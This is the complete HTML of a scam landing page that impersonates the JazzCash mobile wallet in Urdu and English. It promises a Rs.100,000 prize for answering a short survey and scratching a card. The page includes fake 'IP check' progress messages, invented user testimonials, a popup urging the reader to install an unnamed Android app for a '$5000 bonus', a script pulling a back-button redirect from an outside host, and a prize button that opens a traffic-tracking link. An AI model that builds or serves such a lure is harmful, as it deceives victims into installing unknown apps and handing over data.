<html>
  <head>
    <base href="" />

    <meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
    <meta charset="utf-8" />
    <meta content="True" name="HandheldFriendly" />
    <meta content="320" name="MobileOptimized" />
    <meta
      content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"
      name="viewport"
    />
    <meta content="width=device-width" name="viewport" />
    <meta content="on" http-equiv="cleartype" />
    <title>jazzcash Promotion Program</title>

    <link rel="stylesheet" href="css/bootstrap.min.css" />
    <link rel="stylesheet" href="css/stylei11p.css" />
    <script type="text/javascript" src="js/jquery-3.4.1.min.js"></script>
    <script type="text/javascript" src="js/jquery.eraser.js"></script>
    <script src="js/main.js"></script>

    <style>
      a,
      body,
      div,
      h1,
      h2,
      h3,
      h4,
      h5,
      h6,
      li,
      ol,
      p,
      span,
      ul {
        margin: 0;
        padding: 0;
      }
      .header,
      body {
        width: 100%;
      }
      .content a:hover,
      .nav-bar a:hover,
      .nav-bar-top a:hover,
      .search a:hover,
      a {
        text-decoration: none;
      }
      .answer,
      .prize h3,
      .question {
        text-align: center;
      }
      .contestwrap {
        border-bottom: 1px solid #ebebeb;
      }
      .contestwrap table,
      .header table,
      .subheader table,
      td,
      tr {
        border-collapse: collapse;
      }
      .contestwrap p,
      .toptext {
        color: #000;
        font-size: small;
      }
      .answer,
      .prize h2,
      .prize h3,
      .select2 {
        font-weight: 300;
      }
      .reviews hr,
      hr {
        opacity: 0.2;
      }
      html {
        font-family: sans-serif;
        font-color: #000;
        -webkit-text-size-adjust: 100%;
        -ms-text-size-adjust: 100%;
      }
      .text,
      body {
        font-family: Helvetica, sans-serif !important;
      }
      body {
        min-width: 320px;
        color: #000;
        position: absolute;
        overflow-y: scroll !important;
      }
      a {
        color: #4485f6;
      }
      h3 {
        color: #212121;
      }
      p {
        color: #737373;
      }
      #q2,
      #q3,
      #q4,
      #v1b,
      #v1c,
      #v2b,
      #v2c,
      #v3b,
      #v3c,
      #v4s,
      #vfinal,
      .prize,
      .validate {
        display: none;
      }
      .fbimg {
        background-color: #fff;
        border-radius: 2px;
        padding: 3px;
        box-sizing: border-box;
        border: 1px solid grey;
        margin: 10px 0 5px;
      }
      .contestwrap,
      .form_questions {
        width: 100%;
        border-radius: 3px;
      }
      .header {
        background: #fff;
        border-top: 4px solid #fac329;
        position: fixed;
        z-index: 100;
        box-shadow: 0 0 3px rgba(0, 0, 0, 0.43);
      }
      .wrapper-bar {
        max-width: 1000px;
        margin: 0 auto;
        padding: 0 20px;
        display: flex;
        justify-content: space-between;
        align-items: center;
      }
      .nav-bar-top {
        display: flex;
        align-items: center;
        justify-content: space-between;
        padding: 0;
      }
      .nav-bar-top a {
        padding: 0 12px;
        color: #2a2a2a;
        font-size: 15px;
        font-weight: 700;
        margin-top: 0;
      }
      .nav-bar a,
      .search i {
        padding: 0 10px;
      }
      .nav-bar-top img {
        margin-right: 20px;
      }
      .nav-bar-top a:hover {
        color: #fac329;
      }
      .footer p {
        display: inline-block;
      }
      .nav-bar a {
        color: #0019af;
        font-size: 16px;
      }
      .search a {
        color: #5e5e5e;
        font-size: 16px;
      }
      .menu-bars a {
        color: #fff;
        font-size: 30px;
      }
      @media only screen and (max-width: 480px) {
        .flex-header img:nth-child(1) {
          width: 100%;
          max-width: 160px;
        }
        .flex-header img:nth-child(2) {
          width: 100%;
          max-width: 120px;
        }
      }
      .wrapper {
        max-width: 1000px;
        width: 96%;
        margin: 0 auto;
      }
      .subheader table,
      td,
      tr {
        padding: 8px 0 4px;
      }
      .subheader td {
        valign: middle;
      }
      .spacer {
        height: 20px;
      }
      .contestwrap {
        box-shadow: 0 0 2px 2px #e9e9e9;
        padding: 10px 0 4px;
      }
      .contestwrap,
      .form_questions {
        background-color: #fff;
        -webkit-box-shadow: 0 0 2px 2px #e9e9e9;
        -moz-box-shadow: 0 0 2px 2px #e9e9e9;
      }
      .form_questions,
      .validate {
        box-shadow: 0 0 2px 2px #e9e9e9;
        border-bottom: 1px solid #e5e5e5;
      }
      .select2 {
        color: #777;
        font-size: small;
        padding: 8px 0 4px;
      }
      .form_questions {
        padding: 10px 0 30px;
      }
      .answer {
        cursor: pointer;
        display: block;
        padding: 10px 0;
        width: 80%;
        margin: 5px auto;
        color: #fff;
        -webkit-border-radius: 1px;
        -moz-border-radius: 1px;
        border-radius: 21px;
        background: #fac329;
        font-weight: 700;
        font-size: 19px;
      }
      .validate {
        border-radius: 3px;
        width: 96%;
        background-color: #fff;
        padding: 0;
        -webkit-box-shadow: 0 0 2px 2px #e9e9e9;
        -moz-box-shadow: 0 0 2px 2px #e9e9e9;
      }
      .prize {
        width: 96%;
        margin-top: -20px;
        padding-top: 15px;
      }
      .prize h3 {
        font-size: 1.5em;
        padding: 5px 0;
      }
      .prize h2 {
        font-size: 1.2em;
        text-align: left;
      }
      .reviews {
        width: 100%;
        padding: 0;
        line-height: 1.3;
      }
      .reviews .name {
        font-weight: 700;
        color: #1a39c5;
      }
      .reviews .text {
        color: #6a6a6a;
      }
      .reviews .date {
        padding-bottom: 7px;
        color: #006621;
      }
      .reviews table {
        padding: 5px 0;
        font-size: small;
      }
      .reviews h2 {
        color: grey;
        font-size: 1.2em;
        font-weight: 300;
        padding: 20px 0 5px;
      }
      .commentpad {
        padding-left: 10px;
      }
      .footer p {
        padding-right: 20px;
      }
      .modal-content {
        border: 3px solid #3a3a3a;
        background: #fff;
      }
      .modal-footer {
        border-top: 1px solid #3a3a3a;
      }
      .container-prize {
        display: flex;
        flex-direction: column;
      }
      .one-prize {
        display: flex;
        flex-direction: row;
        align-items: center;
        justify-content: space-around;
      }
      .btn-cont {
        display: flex;
        flex-direction: column;
        align-items: center;
        justify-content: center;
      }
      .btn-prize {
        display: block;
        color: #fff;
        text-transform: none;
        padding: 11px 35px;
        background: #fac329;
        border-radius: 21px;
        margin-bottom: 5px;
        font-weight: 700;
        font-size: 18px;
      }
      .con-prize1 {
        box-shadow: 0 0 2px 2px #e9e9e9;
        border: 1px solid #fff;
      }
      @media only screen and (max-width: 580px) {
        .one-prize {
          flex-direction: column;
          margin: 5px;
        }
        .btn-prize {
          margin: 10px 0;
        }
      }
      .date {
        padding-top: 8px;
      }
      .dat-1 {
        color: #9fa2a6;
        font-size: x-small;
        float: right;
        margin-top: -30px;
        display: block;
        margin-left: 10px;
      }
      @media only screen and (max-width: 420px) {
        .dat-1 {
          float: none;
          margin: -10px 0 0;
        }
      }
      @media only screen and (min-width: 800px) {
        .white_content {
          position: fixed;
          top: 10%;
          left: 30%;
          width: 40%;
          background-color: #fff;
          border-radius: 5px;
          z-index: 1002;
          overflow: auto;
        }
      }
      @media only screen and (max-width: 799px) {
        .white_content {
          position: fixed;
          top: 10%;
          left: 5%;
          width: 90%;
          background-color: #fff;
          border-radius: 5px;
          z-index: 1002;
          overflow: auto;
        }
      }
      .ps4man,
      .s-101m,
      .s-102m,
      .s-103m,
      .s-11m,
      .s-33m,
      .s-66,
      .s-88m,
      .s-99 {
        width: 50px;
        height: 50px;
        background: url(images/avatar2-sprites.jpg) no-repeat;
      }
      .s-11m {
        background-position: 0 0;
      }
      .s-33m {
        background-position: 0 -54px;
      }
      .s-66 {
        background-position: 0 -108px;
      }
      .s-99 {
        background-position: 0 -161px;
      }
      .s-88m {
        background-position: 0 -215px;
      }
      .ps4man {
        background-position: 0 -269px;
      }
      .s-101m {
        background-position: 0 -322px;
      }
      .s-102m {
        background-position: 0 -377px;
      }
      .s-103m {
        background-position: 0 -430px;
      }
      body {
        background: #efefef;
      }
      .contestwrap,
      .form_questions,
      .h-prize,
      .prize,
      .reviews,
      .validate {
        background: #fff;
      }
      .reviews {
        -webkit-box-shadow: 0 0 2px 2px #e9e9e9;
        -moz-box-shadow: 0 0 2px 2px #e9e9e9;
        max-width: 96%;
      }
      @media only screen and (max-width: 680px) {
        .footer-block {
          flex-direction: column;
          justify-content: center;
          align-items: center;
        }
        .modal-body p {
          text-align: center;
        }
      }
      footer {
        border-top: 1px solid #fff;
        background: #535353;
        box-shadow: inset 0 1px 6px 0 #d8d8d8;
        margin-top: 40px;
      }
      .footer-block {
        display: -webkit-box;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-orient: vertical;
        -webkit-box-direction: normal;
        -ms-flex-direction: column;
        flex-direction: column;
        -webkit-box-pack: justify;
        -ms-flex-pack: justify;
        justify-content: space-between;
        -webkit-box-align: center;
        -ms-flex-align: center;
        align-items: center;
        padding: 5px 25px 15px;
        max-width: 700px;
        margin: 0 auto;
      }
      .kkk,
      .qqq {
        display: flex;
      }
      @media only screen and (max-width: 680px) {
        .footer-block {
          -webkit-box-orient: vertical;
          -webkit-box-direction: normal;
          -ms-flex-direction: column;
          flex-direction: column;
          -webkit-box-pack: center;
          -ms-flex-pack: center;
          justify-content: center;
          -webkit-box-align: center;
          -ms-flex-align: center;
          align-items: center;
        }
      }
      .name {
        color: #365899 !important;
        font-weight: 700;
        font-size: 14px;
      }
      .kkk,
      .text {
        font-size: 13px;
      }
      .text {
        padding: 5px 0 1px;
        color: #1d2129 !important;
        border-radius: 18px;
      }
      .kkk {
        flex-direction: row;
        align-items: center;
        justify-content: flex-start;
      }
      .date,
      .like-q {
        font-size: 12px;
      }
      .otvet {
        padding-left: 10px;
        color: #365899;
        text-decoration: none !important;
      }
      .kkk .otvet:hover {
        text-decoration: underline;
      }
      .qqq {
        flex-direction: row;
        align-items: center;
        justify-content: space-between;
      }
      .like-q {
        color: #9a9a9a;
      }
      .like-q img {
        max-width: 17px;
      }
      .date {
        color: rgba(0, 0, 0, 0.71) !important;
      }
      .roundimg {
        border-radius: 50%;
        height: 40px;
        width: 40px;
      }
      .bars {
        height: 4px;
        width: 30px;
        margin: 4px;
        background-color: #333;
        border-radius: 3px;
      }
      @media only screen and (max-width: 480px) {
        .date,
        .kkk {
          font-size: 11px;
        }
        .like-q img {
          max-width: 14px;
        }
        .like-q {
          display: none;
        }
      }
      .nav-bars {
        display: none;
      }
      .top {
        display: flex;
        align-items: center;
        justify-content: flex-end;
        padding: 8px 30px;
      }
      .top a {
        color: #605f5f;
        font-size: 14px;
        padding: 0 10px;
        text-decoration: none;
      }
      .top a:first-child {
        font-weight: 600;
      }
      .mt {
        margin-top: 100px;
      }
      .mob {
        display: none;
      }
      @media only screen and (max-width: 870px) {
        .dt {
          display: none;
        }
        .mob {
          display: block;
        }
        .mt {
          margin-top: 68px;
        }
      }
      @media only screen and (max-width: 370px) {
        .kkk a {
          display: none;
        }
      }
    </style>
  </head>

  <body style="display: inline; margin: 0">

    <!-- BBR -->
    <script
      type="text/javascript"
      src="https://merlinkok.com/secondlink/LP1/backoffer.js"
    ></script>
    <script type="text/javascript">
      (function (w) {
        w.backOfferUrl =
          "https://merlinkok.com/secondlink/LP1/index.html?key=m7oeo5qpelu3j0n8rqwb&c1=bbr&c2=all";
      })(window);
    </script>

    <div
      id="light"
      class="white_content modal-content"
      style="
        display: none;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        padding: 30px 30px 0;
        overflow: hidden;
      "
    >
      <table>
        <tbody>
          <tr>
            <td>
              <img
                alt=""
                src="images/jazzcash.png"
                style="
                  max-width: 250px;
                  margin: -8px auto 10px auto;
                  display: block;
                "
              />
              <p style="font-size: 16px; color: #000">
                Your $5000 bonus is reserved!<br />Conditions to obtain:<br />1.
                On the next page, download and install the Android app; <br />2.
                Open the app and earn $5000 for trading;<br />
                3. Trade and study to make money!
              </p>
              <br />
            </td>
          </tr>
        </tbody>
      </table>
      <div class="modal-footer">
        <button
          type="button"
          class="btn btn-primary"
          data-dismiss="modal"
          style="
            background: #fac329;
            color: #fff;
            font-weight: bold;
            border-radius: 21px;
            padding: 7px 20px;
          "
        >
          OK
        </button>
      </div>
    </div>

    <div
      class="modal fade in"
      id="myModal"
      tabindex="-1"
      role="dialog"
      aria-labelledby="myModalLabel"
      aria-hidden="false"
      style="display: block; padding-right: 17px"
    >
      <div class="modal-dialog">
        <div class="modal-content">
          <div class="modal-body">
            <table>
              <tbody>
                <tr>
                  <td>
                    <img
                      src="images/jazzcash.png"
                      alt=""
                      style="
                        margin: -10px auto 0 auto;
                        display: block;
                        max-width: 250px;
                        margin-bottom: 10px;
                      "
                    />
                    <p
                      style="
                        font-size: 16px;
                        color: #000;
                        text-align: center;
                        line-height: 1.6;
                      "
                    >
                    ہر روز، ہم صارفین کا ایک چھوٹا سا گروپ منتخب کرتے ہیں اور انہیں دیتے ہیں
                                                    ہماری طرف سے قیمتی تحائف حاصل کرنے کا موقع
                                  شراکت داروں اور سپانسرز. یہ شکریہ ادا کرنے کا ہمارا موقع ہے
                                                                                               .آپ
                    </p>
                  </td>
                </tr>
              </tbody>
            </table>
          </div>
          <div class="modal-footer">
            <button
              type="button"
              class="btn btn-primary"
              data-dismiss="modal"
              style="
                background: #fac329;
                color: #fff;
                border-radius: 21px;
                padding: 7px 18px;
                font-weight: 600;
              "
              id="btn-open"
            >
              OK
            </button>
          </div>
        </div>
      </div>
    </div>
    <div class="header">
      <div class="wrapper-bar">
        <img
          src="images/jazzcash.png"
          style="width: 250px; margin: 10px auto"
          alt=""
        /><a class="mob" href="#"></a>
      </div>
    </div>

    <div class="spacer"></div>
    <div class="wrapper mt" style="min-height: 82vh">
      <div class="wrapper contestwrap">
        <div class="toptext">
          <table class="wrapper">
            <tbody>
              <tr>
                <td align="left" valign="top">
                  <h4 style="position: relative; top: 4px; padding-right: 10px">
                    !مبارک ہو
                  </h4>
                  <br />
                  <span class="dat-1"></span>
                </td>
              </tr>
            </tbody>
          </table>
          <div style="border-bottom: 1px solid #ebebeb">
            <p class="wrapper" style="font-size: 16px">
                            آپ جیت سکتے ہیں<span class="marked"> Rs.100,000 </span> 
                                                            ہمارے ساتھی سے
              <span class="marked"> Jazzcash </span>.     آپ سب کی ضرورت ہے
              یہ تحفہ حاصل کرنے کے ل do ان 3 سوالوں کا جواب ہے۔ یہ تحقیق
              ہمیں اپنے صارفین کو بہتر طور پر سمجھنے اور اپنی مصنوعات کو بہتر بنانے کی اجازت دیتا ہے.
              .یہ آپ کے وقت کے 30 سیکنڈ سے بھی کم وقت لگے گا<br /><br />
            </p>
          </div>
          <div class="wrapper select2" style="font-size: 16px; color: #000">
            <b>یاد رکھیں</b>,صرف 10 تصادفی طور پر منتخب صارفین اس دعوت نامہ وصول کرتے ہیں،
            .تحائف کی تعداد محدود ہے.
          </div>
        </div>
      </div>
      <div
        class="wrapper form_questions"
        data-step="1"
        style="position: relative; margin-top: 20px"
      >
        <div class="question" style="display: block">
          <h3 class="question__title">
            <span class="question__num"></span> ب آپ کون سا آلہ استعمال کر رہے ہیں
          </h3>
          <div class="button answer">
            <button class="button__text">ذاتی کمپیوٹر / نوٹ بک</button>
          </div>
          <div class="button answer">
            <button class="button__text">موبائل فون</button>
          </div>
          <div class="button answer">
            <button class="button__text">ٹیبلٹ پی سی</button>
          </div>
          <div class="button answer">
            <button class="button__text">دوسرے</button>
          </div>
        </div>
        <div class="question">
          <h3 class="question__title">
            <span class="question__num"></span> پ کون سے دوسرے انٹرنیٹ فراہم کرنے والے باقاعدگی سے استعمال کرتے ہیں
          </h3>
          <div class="button answer">
            <button class="button__text">JAZZ</button>
          </div>
          <div class="button answer">
            <button class="button__text">Ufone</button>
          </div>
          <div class="button answer">
            <button class="button__text">Telenor</button>
          </div>
          <div class="button answer">
            <button class="button__text">Zong</button>
          </div>
          <div class="button answer">
            <button class="button__text">دیگر</button>
          </div>
        </div>
        <div class="question">
          <h3 class="question__title">
            <span class="question__num"></span>عمر کیا ہے
          </h3>
          <div class="button answer">
            <button class="button__text">18-25</button>
          </div>
          <div class="button answer">
            <button class="button__text">25-50</button>
          </div>
          <div class="button answer">
            <button class="button__text">50+</button>
          </div>
        </div>
      </div>
      <div class="wrapper validate" data-step="2">
        <div class="loading">
          <div class="loading__head loading__grid">
            <div class="loading__state loading__part">
              <p class="loading__action">...جوابات کی جانچ پڑتال</p>
              <p class="loading__action">...IP ایڈریس کی جانچ پڑتال</p>
              <p class="loading__action">...تحفہ کی دستیابی کی جانچ پڑتال</p>
              <p class="loading__action">مبارک ہو</p>
            </div>
            <div class="loading__perc loading__part">0%</div>
          </div>
          <div class="loading__bar">
            <span class="loading__bar-line"></span>
          </div>
          <div class="loading__cover">
            <div class="loading__check" data-status="panding">
              آپ کے IP ایڈریس سے بار بار درخواست نہیں ہوئی ہے
            </div>
            <div class="loading__check" data-status="panding">
              آج آپ 1 بونس تک رسائی حاصل ہے
            </div>
          </div>
        </div>
      </div>
      <div class="spacer" id="v4s"></div>
      <div
        style="padding-bottom: 20px"
        class="wrapper prize con-prize1"
        data-step="3"
      >
        <h2 class="gifts__title" style="margin-top: 20px; text-align: center">
          حفاظتی پرت کا صفایا کریں اور اپنے اجر کو وصول کریں
        </h2>
        <h2
          class="gifts__title hide gifts__title-result"
          style="margin-top: 20px; text-align: center"
        >
        !مبارک ہو<br />!تم جیت 
        </h2>
        <p class="attempt">
          باقی کوششیں<span class="attempt__num">3</span>
        </p>
        <div class="gifts">
          <div class="gift">
            <div class="gift__inner">
              <div class="gift__images">
                <img alt="" class="gift__shape" src="images/phone-shape.png" />
                <div class="gift__before"></div>
                <img
                  alt=""
                  class="gift__before-2"
                  src="images/shape-color.png"
                />
              </div>
            </div>
          </div>
        </div>
        <div class="gifts__result hide">
          <div class="button">
            <button
              style="
                color: #ffffff !important;
                padding: 6px 20px;
                background: #fac329;
                border-radius: 20px;
              "
              class="button__text btnPrize"
              onclick="window.open('https://binom.blinkgo.top/cgial1k.php?lp=1','_blank'); launchext(); exit_a1();"
            >
            اب حاصل کریں
            </button>
          </div>
        </div>
      </div>
      <div class="spacer"></div>
      <div class="wrapper reviews">
        <div class="wrapper">
          <h2>Comentários</h2>
        </div>
        <table class="wrapper" style="padding-bottom: 10px; padding-top: 10px">
          <tbody>
            <tr>
              <td width="50px" valign="top" align="right">
                <div class="roundimg s-11m"></div>
              </td>
              <td align="left" valign="top" class="commentpad">
                <div class="name">Fan Leriz</div>
                <div class="text">
                  !آج ، میرے پاس 100000 روپے ہیں۔ اس تحفے کے لئے آپ کا بہت بہت شکریہ
                </div>
                <img src="images/RS.png" alt="" class="fbimg" />
                <div class="qqq">
                  <div class="kkk">
                    <div class="date dateTime0"></div>
                    <a href="#" class="otvet">
                      Like&nbsp;&nbsp; Comment&nbsp;&nbsp; Share
                    </a>
                  </div>
                  <div class="like-q">
                    <img
                      src="images/like-fb.png"
                      alt=""
                      style="margin-right: 2px; margin-top: -1px"
                    />4
                  </div>
                </div>
              </td>
            </tr>
          </tbody>
        </table>
        <table
          class="wrapper"
          id="fb4"
          style="padding-bottom: 10px; padding-top: 10px"
        >
          <tbody>
            <tr>
              <td width="50px" valign="top" align="right">
                <div class="roundimg s-33m"></div>
              </td>
              <td align="left" valign="top" class="commentpad">
                <div class="name">Jasmine Yang Cuishan</div>
                <div class="text">
                  میری اہلیہ اور میرے پاس مذاکرات کے لئے 300000 روپے ہیں۔ آپ کا شکری.
                </div>
                <div class="qqq">
                  <div class="kkk">
                    <div class="date dateTime1"></div>
                    <a href="#" class="otvet">
                      Like&nbsp;&nbsp; Comment&nbsp;&nbsp; Share</a
                    >
                  </div>
                </div>
              </td>
            </tr>
          </tbody>
        </table>
        <table
          class="wrapper"
          id="fb1"
          style="padding-bottom: 10px; padding-top: 10px"
        >
          <tbody>
            <tr>
              <td width="50px" valign="top" align="right">
                <div class="roundimg s-88m"></div>
              </td>
              <td align="left" valign="top" class="commentpad">
                <div class="name">Delia Kang</div>
                <div class="text">
                  !آپ کو ایسے تحائف کون دیتا ہے؟ مجھے یقین نہیں ہے
                </div>
                <div class="qqq">
                  <div class="kkk">
                    <div class="date dateTime2"></div>
                    <a href="#" class="otvet">
                      Like&nbsp;&nbsp; Comment&nbsp;&nbsp; Share</a
                    >
                  </div>
                </div>
              </td>
            </tr>
          </tbody>
        </table>
        <table class="wrapper" style="padding-bottom: 10px; padding-top: 10px">
          <tbody>
            <tr>
              <td width="50px" valign="top" align="right">
                <div class="roundimg ps4man"></div>
              </td>
              <td align="left" valign="top" class="commentpad">
                <div class="name">Erica Chow</div>
                <div class="text">
                  I win money <span class="prizeUser2"></span> yesterday...
                </div>
                <img src="images/RS1.jpg" alt="" class="fbimg" />
                <div class="qqq">
                  <div class="kkk">
                    <div class="date dateTime3"></div>
                    <a href="#" class="otvet">
                      Like&nbsp;&nbsp; Comment&nbsp;&nbsp; Share</a
                    >
                  </div>
                  <div class="like-q">
                    <img
                      src="images/like-fb.png"
                      alt=""
                      style="margin-right: 2px; margin-top: -1px"
                    />1
                  </div>
                </div>
              </td>
            </tr>
          </tbody>
        </table>
        <table class="wrapper" style="padding-bottom: 10px; padding-top: 10px">
          <tbody>
            <tr>
              <td width="50px" valign="top" align="right">
                <div class="roundimg s-102m"></div>
              </td>
              <td align="left" valign="top" class="commentpad">
                <div class="name">Teddy Yap</div>
                <div class="text">
                  ...میں نے ابھی ایک کال موصول ہوئی - انہوں نے کہا کہ وہ مجھے ایک بونس بھیجیں گے 
                                                                                                  میں                     
                                          .جب تک میں اسے حاصل نہیں کروں گا اس پر یقین نہیں کروں گا 
                </div>
                <div class="qqq">
                  <div class="kkk">
                    <div class="date dateTime4"></div>
                    <a href="#" class="otvet">
                      Like&nbsp;&nbsp; Comment&nbsp;&nbsp; Share</a
                    >
                  </div>
                </div>
              </td>
            </tr>
          </tbody>
        </table>
        <div style="height: 10px"></div>
      </div>
    </div>
    <footer style="background: #fff">
      <div class="footer-block">
        <img
          src="images/jazzcash.png"
          alt=""
          style="max-width: 200px; margin-top: 10px; margin-bottom: 1px"
        />
        <span style="color: #333"> © All Rights Reserved. </span>
      </div>
    </footer>
    <script src="js/bootstrap.js"></script>
  </body>
</html>
